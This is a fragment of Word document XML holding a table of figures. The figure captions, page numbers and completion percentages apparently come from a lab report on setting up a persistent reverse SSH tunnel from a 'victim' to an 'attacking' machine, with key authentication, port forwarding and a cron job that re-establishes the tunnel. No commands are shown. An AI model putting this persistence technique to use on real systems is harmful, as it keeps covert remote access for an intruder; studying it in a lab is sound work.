          <w:p w14:paraId="5D215574" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="22" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Completion </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62D83A0D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">(%) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="085408D7"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27E61A87" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4194732D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Diagram 2: Setting up an SSH reverse callback script using cron </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="77135FC8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 8 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3D4E8513" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="4A30B98B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="509"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1AE3D8E7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3204E39F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 1: Creating a new SSH Key Pair </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="009D0C1A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 9 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="23E603E9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="36311D94"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4A4ADBCE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="34DF48F3" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 2: Enabling SSH Public Key Authentication on the Attacking Machine </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="74FE6751" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 10 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5ECE94D8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="200D989A"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15487AF4" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18A1A15C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 4: Verifying SSH Key Authentication from the Victim Machine </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0BB7FB2D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 10 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2C2B9C08" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="5B3022F7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="509"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="44A4208A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67812ABE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Diagram 3: Forwarding ports through an SSH tunnel </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6151A858" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 11 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="14B41256" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="11FD368B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="847"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60BA40A2" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="644E7E10" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 4: Verifying the Forwarder Port on the Attacking Machine </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="32470547" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 12 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69A249FC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="7FB3CC7C"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3A223ED9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4ED1E831" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 5: Connecting to the Victim Machine Through the Forwarded SSH Tunnel </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65C58613" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 13 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65B584C8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="6C6F857F"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2FB8BD77" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D4940FD" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 6: Creating a Bash Script and Cron Job to Automate the SSH Tunnel </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5E4F240B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 14 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D2696AF" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="7B442E36" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="847"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D6155BF" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6A23368F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 7: Automatic Re-establishment of the SSH Tunnel via Cron </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63F0F24D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 14 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2D8C5275" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
